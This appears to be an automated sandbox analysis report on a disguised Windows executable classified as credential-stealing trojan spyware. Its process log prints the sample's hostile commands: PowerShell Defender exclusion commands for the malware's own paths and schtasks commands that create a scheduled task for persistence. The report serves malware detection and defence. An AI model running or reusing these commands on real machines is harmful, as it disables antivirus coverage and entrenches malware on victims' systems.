Source: 9.2.cYDnGbgU.exe.4292550.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.39bcdb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cYDnGbgU.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.3981598.8.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, bal5aDHGqqusl9PpVH.cs	Security API names: _0020.SetAccessControl
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, bal5aDHGqqusl9PpVH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, bal5aDHGqqusl9PpVH.cs	Security API names: _0020.AddAccessRule
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, IdJIQ0mrbn0KCZUl6K.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.72d0000.12.raw.unpack, IdJIQ0mrbn0KCZUl6K.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.2697ab8.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.50c0000.11.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.F#U0130YAT TEKL#U0130F#U0130-2400.exe.2687aa0.5.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

File created: C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Mutant created: \Sessions\1\BaseNamedObjects\uDKYkOOejlkFWgu
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

File created: C:\Users\user\AppData\Local\Temp\tmp38F1.tmp

Jump to behavior

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	ReversingLabs: Detection: 79%
Source: F#U0130YAT TEKL#U0130F#U0130-2400.exe	Virustotal: Detection: 79%

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

File read: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\cYDnGbgU.exe C:\Users\user\AppData\Roaming\cYDnGbgU.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process created: C:\Users\user\AppData\Roaming\cYDnGbgU.exe "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Process created: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Process created: C:\Users\user\AppData\Roaming\cYDnGbgU.exe "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"	Jump to behavior

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Section loaded: gpapi.dll	Jump to behavior
